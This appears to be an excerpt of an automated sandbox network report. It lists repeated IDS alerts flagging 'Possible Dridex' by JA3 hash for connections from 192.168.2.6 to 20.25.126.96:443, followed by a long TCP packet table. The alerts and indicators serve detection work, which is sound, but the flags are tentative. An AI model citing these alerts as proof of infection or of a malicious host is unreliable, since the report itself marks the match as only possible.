2024-10-26T13:44:04.941642+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49826	20.25.126.96	443	TCP
2024-10-26T13:44:07.688886+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49832	20.25.126.96	443	TCP
2024-10-26T13:44:10.361019+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49847	20.25.126.96	443	TCP
2024-10-26T13:44:13.061690+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49862	20.25.126.96	443	TCP
2024-10-26T13:44:15.778625+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49877	20.25.126.96	443	TCP
2024-10-26T13:44:18.484894+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49897	20.25.126.96	443	TCP
2024-10-26T13:44:21.179909+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49915	20.25.126.96	443	TCP
2024-10-26T13:44:23.895011+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49933	20.25.126.96	443	TCP
2024-10-26T13:44:26.612940+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49950	20.25.126.96	443	TCP
2024-10-26T13:44:29.318794+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49965	20.25.126.96	443	TCP
2024-10-26T13:44:32.042278+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49980	20.25.126.96	443	TCP
2024-10-26T13:44:34.763942+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49995	20.25.126.96	443	TCP
2024-10-26T13:44:37.488476+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50010	20.25.126.96	443	TCP
2024-10-26T13:44:40.165251+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50026	20.25.126.96	443	TCP
2024-10-26T13:44:42.835987+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50045	20.25.126.96	443	TCP
2024-10-26T13:44:45.642472+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50062	20.25.126.96	443	TCP
2024-10-26T13:44:48.416246+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50065	20.25.126.96	443	TCP
2024-10-26T13:44:51.344997+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50068	20.25.126.96	443	TCP
2024-10-26T13:44:54.060795+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50071	20.25.126.96	443	TCP
2024-10-26T13:44:56.709003+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50074	20.25.126.96	443	TCP
2024-10-26T13:44:59.449017+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50077	20.25.126.96	443	TCP
2024-10-26T13:45:02.174901+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50080	20.25.126.96	443	TCP
2024-10-26T13:45:04.888705+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50083	20.25.126.96	443	TCP
2024-10-26T13:45:07.603556+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50086	20.25.126.96	443	TCP
2024-10-26T13:45:10.283030+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50089	20.25.126.96	443	TCP
2024-10-26T13:45:12.989545+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50093	20.25.126.96	443	TCP
2024-10-26T13:45:15.686450+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50096	20.25.126.96	443	TCP
2024-10-26T13:45:18.378697+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50099	20.25.126.96	443	TCP
2024-10-26T13:45:22.589406+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50102	20.25.126.96	443	TCP
2024-10-26T13:45:25.255307+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50105	20.25.126.96	443	TCP
2024-10-26T13:45:27.954262+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50108	20.25.126.96	443	TCP
2024-10-26T13:45:30.654752+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50111	20.25.126.96	443	TCP
2024-10-26T13:45:33.419957+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50114	20.25.126.96	443	TCP
2024-10-26T13:45:36.097457+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50117	20.25.126.96	443	TCP
2024-10-26T13:45:38.808343+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50120	20.25.126.96	443	TCP
2024-10-26T13:45:41.657149+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50123	20.25.126.96	443	TCP
2024-10-26T13:45:44.352878+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50126	20.25.126.96	443	TCP
2024-10-26T13:45:47.115614+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50130	20.25.126.96	443	TCP
2024-10-26T13:45:49.806539+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50133	20.25.126.96	443	TCP
2024-10-26T13:45:52.519389+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50136	20.25.126.96	443	TCP
2024-10-26T13:45:55.290464+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50139	20.25.126.96	443	TCP
2024-10-26T13:45:57.979184+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50142	20.25.126.96	443	TCP
2024-10-26T13:46:00.683469+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50145	20.25.126.96	443	TCP
2024-10-26T13:46:03.393152+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50148	20.25.126.96	443	TCP
2024-10-26T13:46:06.059822+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50151	20.25.126.96	443	TCP
2024-10-26T13:46:08.751972+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50154	20.25.126.96	443	TCP
2024-10-26T13:46:11.481153+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50157	20.25.126.96	443	TCP
2024-10-26T13:46:14.188731+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50160	20.25.126.96	443	TCP
2024-10-26T13:46:16.858261+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50163	20.25.126.96	443	TCP
2024-10-26T13:46:20.646912+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50166	20.25.126.96	443	TCP
2024-10-26T13:46:24.305152+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50169	20.25.126.96	443	TCP
2024-10-26T13:46:26.981500+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50172	20.25.126.96	443	TCP
2024-10-26T13:46:29.690918+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50175	20.25.126.96	443	TCP
2024-10-26T13:46:32.386337+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50178	20.25.126.96	443	TCP
2024-10-26T13:46:35.045259+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50181	20.25.126.96	443	TCP
2024-10-26T13:46:37.861128+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50184	20.25.126.96	443	TCP
2024-10-26T13:46:40.558417+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50187	20.25.126.96	443	TCP
2024-10-26T13:46:43.273237+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50190	20.25.126.96	443	TCP
2024-10-26T13:46:46.014854+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50193	20.25.126.96	443	TCP
2024-10-26T13:46:48.736786+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50196	20.25.126.96	443	TCP
2024-10-26T13:46:51.533636+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50199	20.25.126.96	443	TCP
2024-10-26T13:46:54.273511+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50202	20.25.126.96	443	TCP
2024-10-26T13:46:57.003778+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50205	20.25.126.96	443	TCP
2024-10-26T13:46:59.748162+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50208	20.25.126.96	443	TCP
2024-10-26T13:47:02.448936+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50211	20.25.126.96	443	TCP
2024-10-26T13:47:05.148131+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50214	20.25.126.96	443	TCP
2024-10-26T13:47:07.832941+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50218	20.25.126.96	443	TCP
2024-10-26T13:47:10.544254+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50221	20.25.126.96	443	TCP
2024-10-26T13:47:13.235791+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50224	20.25.126.96	443	TCP
2024-10-26T13:47:15.894331+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50227	20.25.126.96	443	TCP
2024-10-26T13:47:18.756780+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50230	20.25.126.96	443	TCP
2024-10-26T13:47:21.430912+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50233	20.25.126.96	443	TCP
2024-10-26T13:47:24.211500+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50236	20.25.126.96	443	TCP
2024-10-26T13:47:26.900568+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50239	20.25.126.96	443	TCP
2024-10-26T13:47:29.616847+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50242	20.25.126.96	443	TCP
2024-10-26T13:47:32.345456+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50245	20.25.126.96	443	TCP
2024-10-26T13:47:35.043396+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	50248	20.25.126.96	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 13:43:33.728765011 CEST	49710	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:33.728822947 CEST	443	49710	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:33.728903055 CEST	49710	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:33.733077049 CEST	49710	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:33.733093023 CEST	443	49710	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:35.032807112 CEST	443	49710	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:35.032958031 CEST	49710	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:35.033072948 CEST	49710	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:35.033093929 CEST	443	49710	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:35.033879995 CEST	49711	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:35.033929110 CEST	443	49711	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:35.034006119 CEST	49711	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:35.034285069 CEST	49711	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:35.034296036 CEST	443	49711	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:36.563503981 CEST	443	49711	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:36.563628912 CEST	49711	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:36.563757896 CEST	49711	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:36.563779116 CEST	443	49711	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:36.564646006 CEST	49713	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:36.564688921 CEST	443	49713	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:36.564775944 CEST	49713	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:36.564835072 CEST	49713	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:36.564866066 CEST	443	49713	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:36.564924002 CEST	49713	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:36.680486917 CEST	49714	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:36.680533886 CEST	443	49714	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:36.680610895 CEST	49714	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:36.681127071 CEST	49714	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:36.681138039 CEST	443	49714	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:37.982615948 CEST	443	49714	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:37.982753038 CEST	49714	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:37.983222008 CEST	49714	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:37.983247995 CEST	443	49714	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:37.983798027 CEST	49720	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:37.983840942 CEST	443	49720	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:37.983922005 CEST	49720	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:37.984185934 CEST	49720	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:37.984199047 CEST	443	49720	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:39.271859884 CEST	443	49720	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:39.271931887 CEST	49720	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:39.271996021 CEST	49720	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:39.272011042 CEST	443	49720	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:39.272530079 CEST	49726	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:39.272571087 CEST	443	49726	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:39.272753000 CEST	49726	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:39.272753000 CEST	49726	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:39.272855043 CEST	443	49726	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:39.272907019 CEST	49726	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:39.383229017 CEST	49728	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:39.383269072 CEST	443	49728	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:39.383358002 CEST	49728	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:39.383661032 CEST	49728	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:39.383675098 CEST	443	49728	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:40.677038908 CEST	443	49728	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:40.677124977 CEST	49728	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:40.677222013 CEST	49728	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:40.677242994 CEST	443	49728	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:40.677917004 CEST	49739	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:40.677983999 CEST	443	49739	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:40.678111076 CEST	49739	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:40.678459883 CEST	49739	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:40.678476095 CEST	443	49739	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:41.965049028 CEST	443	49739	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:41.965189934 CEST	49739	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:41.965264082 CEST	49739	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:41.965291977 CEST	443	49739	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:41.965981960 CEST	49745	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:41.966027021 CEST	443	49745	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:41.966104031 CEST	49745	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:41.966202974 CEST	49745	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:41.966234922 CEST	443	49745	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:41.966279984 CEST	49745	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:42.074121952 CEST	49750	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:42.074134111 CEST	443	49750	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:42.074198961 CEST	49750	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:42.074387074 CEST	49750	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:42.074394941 CEST	443	49750	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:43.356300116 CEST	443	49750	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:43.356489897 CEST	49750	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:43.356564999 CEST	49750	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:43.356585026 CEST	443	49750	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:43.357348919 CEST	49756	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:43.357391119 CEST	443	49756	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:43.357479095 CEST	49756	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:43.357770920 CEST	49756	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:43.357784033 CEST	443	49756	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:44.631216049 CEST	443	49756	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:44.631299973 CEST	49756	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:44.631422997 CEST	49756	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:44.631447077 CEST	443	49756	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:44.632498980 CEST	49763	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:44.632543087 CEST	443	49763	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:44.632616043 CEST	49763	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:44.632693052 CEST	49763	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:44.632723093 CEST	443	49763	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:44.632772923 CEST	49763	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:44.742820024 CEST	49764	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:44.742862940 CEST	443	49764	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:44.742953062 CEST	49764	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:44.743247986 CEST	49764	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:44.743264914 CEST	443	49764	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:46.008045912 CEST	443	49764	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:46.008162975 CEST	49764	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:46.008304119 CEST	49764	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:46.008352995 CEST	443	49764	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:46.009344101 CEST	49775	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:46.009399891 CEST	443	49775	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:46.009471893 CEST	49775	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:46.009735107 CEST	49775	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:46.009749889 CEST	443	49775	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:47.318197012 CEST	443	49775	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:47.318278074 CEST	49775	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:47.318362951 CEST	49775	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:47.318377972 CEST	443	49775	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:47.318881989 CEST	49781	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:47.318902016 CEST	443	49781	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:47.318984032 CEST	49781	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:47.319053888 CEST	49781	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:47.319116116 CEST	443	49781	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:47.319220066 CEST	49781	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:47.430023909 CEST	49783	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:47.430035114 CEST	443	49783	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:47.430107117 CEST	49783	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:47.430315971 CEST	49783	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:47.430325985 CEST	443	49783	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:48.722495079 CEST	443	49783	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:48.722574949 CEST	49783	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:48.722807884 CEST	49783	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:48.722831964 CEST	443	49783	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:48.723429918 CEST	49788	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:48.723468065 CEST	443	49788	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:48.723540068 CEST	49788	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:48.723728895 CEST	49788	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:48.723742008 CEST	443	49788	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:50.034344912 CEST	443	49788	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:50.034497023 CEST	49788	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.034497023 CEST	49788	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.034996033 CEST	49792	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.035043001 CEST	443	49792	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:50.035125017 CEST	49792	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.035358906 CEST	49792	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.035393953 CEST	443	49792	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:50.035511017 CEST	49792	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.150010109 CEST	49793	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.150057077 CEST	443	49793	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:50.150260925 CEST	49793	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.150553942 CEST	49793	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.150568962 CEST	443	49793	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:50.335592985 CEST	49788	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:50.335639000 CEST	443	49788	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:51.454684019 CEST	443	49793	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:51.454786062 CEST	49793	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:51.454885006 CEST	49793	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:51.454924107 CEST	443	49793	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:51.455394030 CEST	49797	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:51.455434084 CEST	443	49797	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:51.455547094 CEST	49797	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:51.455794096 CEST	49797	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:51.455806971 CEST	443	49797	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:52.743545055 CEST	443	49797	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:52.743719101 CEST	49797	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:52.743802071 CEST	49797	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:52.743824959 CEST	443	49797	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:52.744752884 CEST	49800	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:52.744813919 CEST	443	49800	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:52.744899988 CEST	49800	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:52.744954109 CEST	49800	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:52.745062113 CEST	443	49800	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:52.745115042 CEST	49800	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:52.852004051 CEST	49801	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:52.852070093 CEST	443	49801	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:52.852240086 CEST	49801	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:52.852601051 CEST	49801	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:52.852617979 CEST	443	49801	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:54.168724060 CEST	443	49801	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:54.168915033 CEST	49801	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:54.168979883 CEST	49801	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:54.169006109 CEST	443	49801	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:54.169584990 CEST	49805	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:54.169645071 CEST	443	49805	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:54.169732094 CEST	49805	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:54.169985056 CEST	49805	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:54.170001030 CEST	443	49805	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:55.451971054 CEST	443	49805	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:55.452052116 CEST	49805	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:55.452163935 CEST	49805	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:55.452188015 CEST	443	49805	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:55.452819109 CEST	49807	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:55.452850103 CEST	443	49807	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:55.452934980 CEST	49807	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:55.453037977 CEST	49807	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:55.453074932 CEST	443	49807	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:55.453134060 CEST	49807	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:55.555124044 CEST	49808	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:55.555177927 CEST	443	49808	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:55.555275917 CEST	49808	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:55.555581093 CEST	49808	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:43:55.555596113 CEST	443	49808	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:56.851994991 CEST	443	49808	20.25.126.96	192.168.2.6
Oct 26, 2024 13:43:56.852102041 CEST	49808	443	192.168.2.6	20.25.126.96
